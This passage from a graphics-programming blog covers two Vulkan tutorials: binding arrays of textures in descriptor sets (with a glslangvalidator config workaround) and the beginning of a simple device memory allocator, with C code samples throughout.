<p>Setting up a descriptor set binding to work with an array of textures looks very similar to setting it up to work with a single texture. The main difference is the “decsriptorCount” variable on the VkDescriptorSetLayoutBinding structure: with a single texture you’d set this to 1, whereas with an array of textures, you set that variable to the number of elements in your array. For the above shader, the layout binding structure for the texture array might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkDescriptorSetLayoutBinding</span> <span class="n">layoutBinding</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">descriptorCount</span> <span class="o">=</span> <span class="mi">8</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">stageFlags</span> <span class="o">=</span> <span class="n">VK_SHADER_STAGE_FRAGMENT_BIT</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">descriptorType</span> <span class="o">=</span> <span class="n">VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE</span><span class="p">;</span>
<span class="n">layoutBinding</span><span class="p">.</span><span class="n">pImmutableSamplers</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span></code></pre></figure>
<p>In hindsight, this is pretty obvious, but it took me awhile to realize that “descriptorCount” was the right spot for this information.</p>
<p>Once the above is set up, you just create your DescriptorSet (and DescriptorSetLayout) like you would with any other layout binding types. The demo app I posted has a working example of all of that.</p>
<h2 id="writing-the-descriptor-sets">Writing the Descriptor Sets</h2>
<p>Similar to the above, writing a texture array to a descriptor set is much more straightforward than it seems at first. The key is to have your VkDescriptorImageInfo structs already in an array. If you aren’t using a combined image sampler, you don’t actually need to fill in the sampler value on these structs. In my demo project, I set up this array like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkDescriptorImageInfo</span> <span class="n">descriptorImageInfos</span><span class="p">[</span><span class="n">TEXTURE_ARRAY_SIZE</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">TEXTURE_ARRAY_SIZE</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">demoData</span><span class="p">.</span><span class="n">descriptorImageInfos</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">sampler</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">demoData</span><span class="p">.</span><span class="n">descriptorImageInfos</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">imageLayout</span> <span class="o">=</span> <span class="n">VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL</span><span class="p">;</span>
<span class="n">demoData</span><span class="p">.</span><span class="n">descriptorImageInfos</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">imageView</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">textures</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">view</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>In a non contrived application, you likely won’t have all the imageViews already in a neat little array like this, but it doesn’t matter how those image views are laid out, as long as the DescriptorImageInfo structs you use are in an array of some kind.</p>
<p>Once you’ve set up those structs, setting up the rest of the WriteDescriptorSet for the array of textures is very simple:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkWriteDescriptorSet</span> <span class="n">setWrites</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">sType</span> <span class="o">=</span> <span class="n">VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">dstBinding</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">dstArrayElement</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">descriptorType</span> <span class="o">=</span> <span class="n">VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">descriptorCount</span> <span class="o">=</span> <span class="n">TEXTURE_ARRAY_SIZE</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">pBufferInfo</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">dstSet</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">descriptorSet</span><span class="p">;</span>
<span class="n">setWrites</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="n">pImageInfo</span> <span class="o">=</span> <span class="n">demoData</span><span class="p">.</span><span class="n">descriptorImageInfos</span><span class="p">;</span></code></pre></figure>
<p>Note that just like earlier with the DescriptorSetLayoutBinding, the descriptorCount variable here is where you need to specify the length of your array.</p>
<h2 id="glslangvalidator-and-large-arrays">GlslangValidator And Large Arrays</h2>
<p>If you’re using the standable glslangvalidator tool from the <a href="https://github.com/KhronosGroup/glslang">glslang project</a>, you’re going to run into some issues if you try to make a large array of textures (ie / more than 80). If you do that, you’ll see an error message like the following:</p>
<blockquote>
<p>‘binding’ : sampler binding not less than gl_MaxCombinedTextureImageUnits (using array)</p>
</blockquote>
<p>This was a problem for me because I want to keep all the textures used in any given frame bound, so my initial array size was set to 4096 (with all of those image views defaulting to the same image). As you probably guessed from the “gl_” prefix in the error being generated, this error doesn’t actually apply to Vulkan shaders, so if you’re sure that your shader will never be used by OpenGL, you need to tell the compiler not to worry about gl_MaxCombinedTextureImageUnits.</p>
<p>To do this, you need to create a device capabilities config file, like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"> <span class="s">"glslangvalidator -c > myconfig.config"</span>
</code></pre></figure>
<p>It’s important that your file uses the .config extension, because that’s the extension that glslangvalidator will look for in it’s argument list to know if an alternate config file is being provided.</p>
<p>Once you have this config file, all you need to do is open it up in your favourite text editor and look for the “MaxCombinedTextureImageUnits” line:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">MaxVertexAttribs</span> <span class="mi">64</span>
<span class="n">MaxVertexUniformComponents</span> <span class="mi">4096</span>
<span class="n">MaxVaryingFloats</span> <span class="mi">64</span>
<span class="n">MaxVertexTextureImageUnits</span> <span class="mi">32</span>
<span class="n">MaxCombinedTextureImageUnits</span> <span class="mi">80</span>
<span class="n">MaxTextureImageUnits</span> <span class="mi">32</span></code></pre></figure>
<p>Change that 80 to a really big number and you’re on your way. One thing to note is that I ran into some issues when I did this originally because I generated the config file using powershell, which defaults to writing text files out using UCS2-LE text encoding. You don’t want that. Make sure that your cconfig file is set to a sane encoding, like UTF-8, otherwise the validator won’t be able to read the file back in properly.</p>
<p>Once you have your properly encoded, lots of textures using config file ready you are good to recompile your shader. This time, invoke the compiler like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">glslangvalidator</span> <span class="o">-</span><span class="n">V</span> <span class="n">myfile</span><span class="p">.</span><span class="n">frag</span> <span class="n">myconf</span><span class="p">.</span><span class="n">conf</span></code></pre></figure>
<p>As long as your config file uses the .conf extension, that should be all you need to get it to stop complaining and do its job.</p>
<h2 id="thats-all-folks">That’s All Folks!</h2>
<p>When all the above is done, you should be able to simply pass your array index via push constants the same way you’d pass anything else via push constants and be on your way. If anything above was unclear, let me point you again in the direction of the <a href="https://github.com/khalladay/VulkanDemoProjects/tree/master/VulkanDemoProjects/TextureArrays">demo project</a> on github, which will provide you with a relatively small working example.</p>
<p>Hopefully this was helpful! I realize it’s a short post, and there’s nothing here thats groundbreaking, but (imo), Vulkan needs more easily digestible tutorial content, so here this post is. In any case, if you want to say hi, send a message to @khalladay <a href="https://twitter.com/khalladay">on Twitter</a> or <a href="https://mastodon.gamedev.place/@khalladay">on Mastodon</a>. Thanks for reading!</p>
A Simple Device Memory Allocator For Vulkan2017-12-13T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/12/13/Custom-Allocators-Vulkan<p>Last month, I posted about the <a href="http://kylehalladay.com/blog/tutorial/2017/11/27/Vulkan-Material-System.html">material system</a> that I’ve been trying to piece together, and talked about how the next step for that system was going to be to extend it to handle material instances. This sounded like a great next step until I started building it and realized that in order for this to work with arbitrary data, I needed to sort out how I wanted to manage allocating arbitrary amounts of Vulkan device memory.</p>
<p>Vulkan only gives you a limited amount of allocations that you’re allowed to have active at one time (set by your gpu), so I can’t keep creating new allocations for every new material, and I definitely can’t for material instances. So instead of pressing forward with the material system, I took a quick detour to figure out how to write a memory allocator that would solve this problem for me.</p>
<p>If you’re not interested in the implementation details, GPUOpen already has a very capable memory allocator that’s open source and ready to use, and is way better than what I’ve put together (you can get it <a href="https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator">here</a>) but I wanted to figure out how to write my own, which is what I’m going to talk about for the rest of this post.</p>
<div align="center">
<img src="/images/post_images/2017-12-14/duck.jpg" />
<font size="2">I have no idea how to take a picture of an allocator</font>
<br /><br />
</div>
<h2 id="understanding-vulkan-memory">Understanding Vulkan Memory</h2>
<p>The first thing I needed to take a look at was how exactly Vulkan memory worked, and there wasn’t a better spot than the output of <a href="https://www.khronos.org/registry/vulkan/specs/1.0/man/html/vkGetPhysicalDeviceMemoryProperties.html">vkGetPhysicalDeviceMemoryProperties</a></p>
<p>On my GPU (GTX 1060), this reported that my device had 2 memory heaps, one that was 6 GB, and one that was 16 GB, this was interesting because according to NVidia’s system stats, my gpu only has 14.2 GB of total graphics memory (and I never really figured out what this discrepancy was all about). However, the 6GB number made sense, since that’s how much dedicated video memory I have on my card.</p>
<p>The only other information given about these heaps was a “flags” variable. A quick look at the Vulkan docs reveals that there’s only one flag defined right now:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="k">enum</span> <span class="n">VkMemoryHeapFlagBits</span> <span class="p">{</span>
<span class="n">VK_MEMORY_HEAP_DEVICE_LOCAL_BIT</span> <span class="o">=</span> <span class="mh">0x00000001</span><span class="p">,</span>
<span class="p">}</span> <span class="n">VkMemoryHeapFlagBits</span><span class="p">;</span></code></pre></figure>
<p>Which makes sense because my 6 GB heap is listed with a flags value of 1, making it the device local memory (which is what I’d expect, given that it’s my dedicated memory), and the other heap has a flags value of 0, which I assume just means that anything goes with that heap.</p>
<p>The other thing returned by vkGetPhysicalDeviceMemoryProperties is an array of memory types. These are important because when you’re allocating memory pools, you can’t mix memory types, so unlike on the CPU where you can malloc up as much as you want and parcel it out to anything, in Vulkan, you need multiple large allocations that you parcel out from based on type.</p>
<p>Vulkan memory types are identified by what heap they belong to, and which of the following property bits they have set:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="k">enum</span> <span class="n">VkMemoryPropertyFlagBits</span> <span class="p">{</span>
<span class="n">VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT</span> <span class="o">=</span> <span class="mh">0x00000001</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT</span> <span class="o">=</span> <span class="mh">0x00000002</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_HOST_COHERENT_BIT</span> <span class="o">=</span> <span class="mh">0x00000004</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_HOST_CACHED_BIT</span> <span class="o">=</span> <span class="mh">0x00000008</span><span class="p">,</span>
<span class="n">VK_MEMORY_PROPERTY_LAZILY_ALLOCATED_BIT</span> <span class="o">=</span> <span class="mh">0x00000010</span><span class="p">,</span>
<span class="p">}</span> <span class="n">VkMemoryPropertyFlagBits</span><span class="p">;</span></code></pre></figure>
<p>On my machine, using the above information, I could determine the following about the memory types I have available:</p>
<ul>
<li>7 memory types that use Heap 1 (all graphics memory), but have none of the above properties (wtf?)</li>
<li>2 memory types which have the VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT property, and are located in heap 0 (dedicated memory)</li>
<li>1 memory type which have the VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT and VK_MEMORY_PROPERTY_HOST_COHERENT_BITproperties, located in heap 1</li>
<li>1 memory type which have the VK_MEMORY_PROPERTY_HOST_CACHED_BIT, VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, and VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT properties, in heap 1</li>
</ul>
<p>Some of this makes sense, but wtf is going on with the duplicate memory types? Quick, REACT WITH BLAME!</p>
<h2 id="this-is-nvidias-fault">This is NVidia’s Fault!</h2>
<p>A quick jaunt over to the <a href="">Vulkan Hardware Database</a> shows that it’s only NVidia cards that have these extra memory types, and a quick trip to google turns up <a href="https://developer.nvidia.com/what%E2%80%99s-your-vulkan-memory-type">this article</a>, which says that in additional to the memory types that Vulkan gives you, NVidia cards have additional types which are specialized for certain kinds of data. Fair enough, the problem is figuring out which of our mystery memory types are for what data.</p>
<p>Here’s where you really hope the article has an enum definition or something, but instead we get this:</p>
<blockquote>
<p>A memory allocator that follows the rules and guidance of the Vulkan specification should be able to handle all these memory types gracefully by properly interpreting the VkMemoryRequirements::memoryTypeBits member when selecting an allocation for a specific resource.</p>
</blockquote>
<p>Gee… thanks. Turns out, even when you’re working with Vulkan, you have to accept some amount of vendor specific magic behind the scenes.</p>
<p>Thankfully, the <a href="https://www.khronos.org/registry/vulkan/specs/1.0/html/vkspec.html#memory-device">Vulkan spec</a> gives us the exact bit of code we need to follow its “rules and guidance” when determining what memory type to use:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">// Find a memory in `memoryTypeBitsRequirement` that includes all of `requiredProperties`</span>
<span class="kt">int32_t</span> <span class="nf">findProperties</span><span class="p">(</span><span class="k">const</span> <span class="n">VkPhysicalDeviceMemoryProperties</span><span class="o">*</span> <span class="n">pMemoryProperties</span><span class="p">,</span>
<span class="kt">uint32_t</span> <span class="n">memoryTypeBitsRequirement</span><span class="p">,</span>
<span class="n">VkMemoryPropertyFlags</span> <span class="n">requiredProperties</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">const</span> <span class="kt">uint32_t</span> <span class="n">memoryCount</span> <span class="o">=</span> <span class="n">pMemoryProperties</span><span class="o">-></span><span class="n">memoryTypeCount</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">memoryIndex</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">memoryIndex</span> <span class="o"><</span> <span class="n">memoryCount</span><span class="p">;</span> <span class="o">++</span><span class="n">memoryIndex</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">const</span> <span class="kt">uint32_t</span> <span class="n">memoryTypeBits</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="o"><<</span> <span class="n">memoryIndex</span><span class="p">);</span>
<span class="k">const</span> <span class="n">bool</span> <span class="n">isRequiredMemoryType</span> <span class="o">=</span> <span class="n">memoryTypeBitsRequirement</span> <span class="o">&</span> <span class="n">memoryTypeBits</span><span class="p">;</span>
<span class="k">const</span> <span class="n">VkMemoryPropertyFlags</span> <span class="n">properties</span> <span class="o">=</span> <span class="n">pMemoryProperties</span><span class="o">-></span><span class="n">memoryTypes</span><span class="p">[</span><span class="n">memoryIndex</span><span class="p">].</span><span class="n">propertyFlags</span><span class="p">;</span>
<span class="k">const</span> <span class="n">bool</span> <span class="n">hasRequiredProperties</span> <span class="o">=</span> <span class="p">(</span><span class="n">properties</span> <span class="o">&</span> <span class="n">requiredProperties</span><span class="p">)</span> <span class="o">==</span> <span class="n">requiredProperties</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isRequiredMemoryType</span> <span class="o">&&</span> <span class="n">hasRequiredProperties</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">static_cast</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">memoryIndex</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">// failed to find memory type</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>So until I find a good reason to not use the above code exactly, I’m going to copy/paste the crap out of it.</p>
<h2 id="allocating-device-memory">Allocating Device Memory</h2>
<p>The next thing I looked into was how to allocate device memory. I almost skipped this step, given that I’ve built a few projects already, and figured that calling vkAllocateMemory was about all there was to it. Turns out I was wrong and there were few things that I didn’t realize I needed to keep in mind. All this information comes from the <a href="https://www.khronos.org/registry/vulkan/specs/1.0/man/html/vkAllocateMemory.html">vulkan spec page</a> for vkAllocateMemory, so if you want to go straight to the source, there it is.</p>
<p>Here are all the things I didn’t know about allocating device memory before I looked there:</p>
<ul>
<li>
<p>vkAllocateMemory is guaranteed to return an allocation that is aligned to the largest alignment requirement for your Vulkan implementation (ie: if one resource type needs to be 16 byte aligned, and another type 128 byte aligned, all vkAllocateMemory calls will be 128 bit aligned), so you never have to worry about the alignment of these allocs.</p>
</li>
<li>
<p>Some platforms limit the maximum size a single allocation can be, and this limit can be different for each memory type. So if you’re getting VK_ERROR_OUT_OF_DEVICE_MEMORY errors but don’t see an obvious cause, that may be it.</p>
</li>
<li>
<p>There is a limit to the amount of memory available in each memory heap your implementation provides (found in vkGetPhysicalDeviceMemoryProperties).</p>
</li>
<li>
<p>The vkAllocateMemory call has a parameter for a VkAllocationCallbacks structure, which can be used to provide custom allocators for host memory. I’m ignoring this today, but it’s good to know what that argument for.</p>
</li>
</ul>
<p>Finally, as mentioned earlier, Vulkan limits the number of vkDeviceMemory allocations you can have active at one time. You can grab the limit from VkPhysicalDeviceLimits (on my gpu, the limit was 4096). If you try to exceed this limit, you get VK_ERROR_TOO_MANY_OBJECTS. This allocation count limit is the reason for all of this work: I don’t want to write a material instancing system that bogarts all my allocations.</p>
<h2 id="binding-memory-and-freeing-resources">Binding Memory And Freeing Resources</h2>
<p>Assuming that all of the nuances of allocating memory have been properly handled, there’s still the matter of actually using that memory. In Vulkan, this means “binding” a buffer to some region of a vkDeviceMemory allocation. Luckily this is much more straightforward than allocating the memory: all you need to do is call a binding function, like one of these:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkResult</span> <span class="nf">vkBindBufferMemory</span><span class="p">(</span>
<span class="n">VkDevice</span> <span class="n">device</span><span class="p">,</span>
<span class="n">VkBuffer</span> <span class="n">buffer</span><span class="p">,</span>
<span class="n">VkDeviceMemory</span> <span class="n">memory</span><span class="p">,</span>
<span class="n">VkDeviceSize</span> <span class="n">memoryOffset</span><span class="p">);</span>
<span class="n">VkResult</span> <span class="nf">vkBindImageMemory</span><span class="p">(</span>
<span class="n">VkDevice</span> <span class="n">device</span><span class="p">,</span>
<span class="n">VkImage</span> <span class="n">image</span><span class="p">,</span>
<span class="n">VkDeviceMemory</span> <span class="n">memory</span><span class="p">,</span>
<span class="n">VkDeviceSize</span> <span class="n">memoryOffset</span><span class="p">);</span></code></pre></figure>
<p>Unlike vkAllocateMemory, which I brought up specifically to talk about all the gotchas, the functions used to bind memory are really simple. Instead, I’m mentioning this one to provide some info about how I decided on the structure of my allocator. Since any allocator that will solve the allocation count limit problem is going to be subdividing up large allocations, any call to allocate memory needs to return both the VkDeviceMemory handle for the large allocation we’re subdividing, and the offset into that allocation used for this specific resource so that the allocation can be bound correctly.</p>
<p>I ended up settling on this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">Allocation</span>
<span class="p">{</span>
<span class="n">VkDeviceMemory</span> <span class="n">handle</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">type</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">id</span><span class="p">;</span>
<span class="n">VkDeviceSize</span> <span class="n">size</span><span class="p">;</span>
<span class="n">VkDeviceSize</span> <span class="n">offset</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>The only thing that may not be readily apparent is the id variable, which I’m adding since I’m assuming at some point I’ll need some extra bits to help find the allocation inside a memory pool.</p>
<p>It’s worth noting that once you bind memory to a Vulkan resource, the only way you can unbind that memory is to destroy the buffer, image, or whatever else that memory is bound too. You can free memory that’s currently bound to something (as long as you make sure to stop using whatever it was bound to), but you can’t decide to bind an allocated chunk of memory to something new until the original binding has been destroyed.</p>
<p>Whew, all that theory is finally out of the way! It’s time to actually build something.</p>
<h2 id="a-basic-allocator-structure">A Basic Allocator Structure</h2>
<p>For my project, all I did was define some function pointers for allocating things, and then have whatever allocator I wanted to use write to those pointers with its own functions. Sure, this means that I can’t have multiple allocators in use at once, but I think I’m having the right amount of fun just worrying about 1 allocator right now. I already have a global struct called vkh::Context (vkh is the namespace for my “vulkan helper” code), so I just added another member to this struct that looks like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">AllocatorInterface</span>
<span class="p">{</span>
<span class="c1">//setup the allocator</span>
<span class="c1">//args: vkh context structure</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">activate</span><span class="p">)(</span><span class="n">VkhContext</span><span class="o">*</span><span class="p">);</span>
<span class="c1">//args: mem handle, size of alloc, mem type</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">alloc</span><span class="p">)(</span><span class="n">Allocation</span><span class="o">&</span><span class="p">,</span> <span class="n">VkDeviceSize</span><span class="p">,</span> <span class="kt">uint32_t</span><span class="p">);</span>
<span class="c1">//args: mem handle</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">free</span><span class="p">)(</span><span class="n">Allocation</span><span class="o">&</span><span class="p">);</span>
<span class="c1">//args: memory type</span>
<span class="kt">size_t</span><span class="p">(</span><span class="o">*</span><span class="n">allocatedSize</span><span class="p">)(</span><span class="kt">uint32_t</span><span class="p">);</span>
<span class="c1">//returns total number of active vulkan allocs</span>
<span class="kt">uint32_t</span><span class="p">(</span><span class="o">*</span><span class="n">numAllocs</span><span class="p">);</span>
<span class="p">};</span></code></pre></figure>
<p>The VkhContext structure can be found on github in <a href="https://github.com/khalladay/VkMaterialSystem/blob/master/VkMaterialSystem/vkh.h">vkh.h</a>.</p>
<h2 id="a-passthrough-allocator">A Passthrough Allocator</h2>
<p>To start things off, I decided that I wanted to build an allocator that did nothing, or rather, that just made the exact same calls that my program code was making otherwise, but routed through this “passthrough” allocator. This gave me a starting place for defining the interface I needed, and was pretty simple, since all my code already routed calls to allocate memory through two functions.</p>
<p>I’ll leave out the activate function because it’s specific to my program, and boring. Instead I want to start by showing off the allocate function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">alloc</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">outAlloc</span><span class="p">,</span> <span class="n">VkDeviceSize</span> <span class="n">size</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">memoryType</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">state</span><span class="p">.</span><span class="n">totalAllocs</span><span class="o">++</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">memoryType</span><span class="p">]</span> <span class="o">+=</span> <span class="n">size</span><span class="p">;</span>
<span class="n">VkMemoryAllocateInfo</span> <span class="n">allocInfo</span> <span class="o">=</span> <span class="n">vkh</span><span class="o">::</span><span class="n">memoryAllocateInfo</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">memoryType</span><span class="p">);</span>
<span class="n">VkResult</span> <span class="n">res</span> <span class="o">=</span> <span class="n">vkAllocateMemory</span><span class="p">(</span><span class="n">state</span><span class="p">.</span><span class="n">context</span><span class="o">-></span><span class="n">device</span><span class="p">,</span> <span class="o">&</span><span class="n">allocInfo</span><span class="p">,</span> <span class="n">nullptr</span><span class="p">,</span> <span class="o">&</span><span class="p">(</span><span class="n">outAlloc</span><span class="p">.</span><span class="n">handle</span><span class="p">));</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">type</span> <span class="o">=</span> <span class="n">memoryType</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">checkf</span><span class="p">(</span><span class="n">res</span> <span class="o">!=</span> <span class="n">VK_ERROR_OUT_OF_DEVICE_MEMORY</span><span class="p">,</span> <span class="s">"Out of device memory"</span><span class="p">);</span>
<span class="n">checkf</span><span class="p">(</span><span class="n">res</span> <span class="o">!=</span> <span class="n">VK_ERROR_TOO_MANY_OBJECTS</span><span class="p">,</span> <span class="s">"Attempting to create too many allocations"</span><span class="p">)</span>
<span class="n">checkf</span><span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="n">VK_SUCCESS</span><span class="p">,</span> <span class="s">"Error allocating memory in passthrough allocator"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Ok, so this function is also pretty boring in the passthrough allocator, but there’s a couple of key things to note:</p>
<ul>
<li>All the errors I mentioned earlier are checked for. The checkf function essentially a macro for an assert that prints a log message and pops up a message window if it fails.</li>
<li>Even though we aren’t using it in this allocator, the Allocation structure we’re returning gets it’s offset set to 0 so that we can pass the offset to bind calls later.</li>
</ul>
<p>With the allocation code out of the way, the rest of the allocator interface is pretty boring to look at:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">free</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">allocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">state</span><span class="p">.</span><span class="n">totalAllocs</span><span class="o">--</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">]</span> <span class="o">-=</span> <span class="n">allocation</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">vkFreeMemory</span><span class="p">(</span><span class="n">state</span><span class="p">.</span><span class="n">context</span><span class="o">-></span><span class="n">device</span><span class="p">,</span> <span class="p">(</span><span class="n">allocation</span><span class="p">.</span><span class="n">handle</span><span class="p">),</span> <span class="n">nullptr</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">size_t</span> <span class="nf">allocatedSize</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">memoryType</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">memoryType</span><span class="p">];</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">numAllocs</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">state</span><span class="p">.</span><span class="n">totalAllocs</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The entire source for this class is available <a href="https://github.com/khalladay/VkMaterialSystem/blob/material-instances/VkMaterialSystem/vkh_allocator_passthrough.cpp">on github</a>, but the above is the part that matters for what I’m talking about right now.</p>
<p>What’s nice about this is that even though it really isn’t doing anything interesting, it at least gives us a bit more insight into our memory use, which is certainly useful by itself. For example I know that the <a href="https://github.com/khalladay/VkMaterialSystem">material system demo app</a> I posted last month needs 11 active allocations to render the frame, which is more than I knew last month when I wrote the thing.</p>
<h2 id="a-better-allocator-structure">A Better Allocator Structure</h2>
<p>Despite being pretty useful, the passthrough allocator didn’t solve the allocation count problem that I needed solve. I needed to do something a bit more interesting.</p>
<p>So here’s what I ended up resolving to build (remember, I just wanted something functional, so don’t take any of this as a great idea):</p>
<ul>
<li>The allocator needs separate memory pools, one for each type of vulkan memory (this is required by the spec anyway)</li>
<li>Each pool is made up of an array of large VkDeviceMeemory allocations and associated usage data about those allocations</li>
<li>When something needs memory, I’ll go through each large allocation, looking for the first large enough memory chunk in an allocation’s usage data</li>
<li>If no gap is found, I’ll create a new large allocation to use, and add it to that pool’s array.</li>
</ul>
<p>There are lots of details that real allocators worry about that the above doesn’t begin to cover, but I’m already down this rabbit hole far enough for my liking right now, and this minimal allocator suits my current needs just fine.</p>
<h2 id="how-subdividing-device-memory-works">How Subdividing Device Memory Works</h2>
<p>The basics of subdividing device memory are simple - call vkBindDeviceMemory with a VkDeviceMemory to the allocation you’re subdividing, and use the offset argument to select where in that allocation to go, but I figured there had to be more to it than that. One of the things I was sure that I needed to figure out was how to decide how big to make my large allocations, or heck, even how big a memory page is on the gpu.</p>
<p>Reading through the spec (<a href="https://vulkan.lunarg.com/doc/view/1.0.26.0/linux/vkspec.chunked/ch11s06.html">11.6. Resource Memory Association</a>), I noticed the concept of “buffer-image granularity.” The description in the spec was fairly confusing, but what I took away from it is that in addition to alignment concerns when sub allocating from a larger device memory allocation, if you’re going to be using the same alloc for buffers and images, you also need to space them far enough apart within the alloc to satisfy this implementation defined value. If you screw this up, your validation layer let you know with the message:</p>
<blockquote>
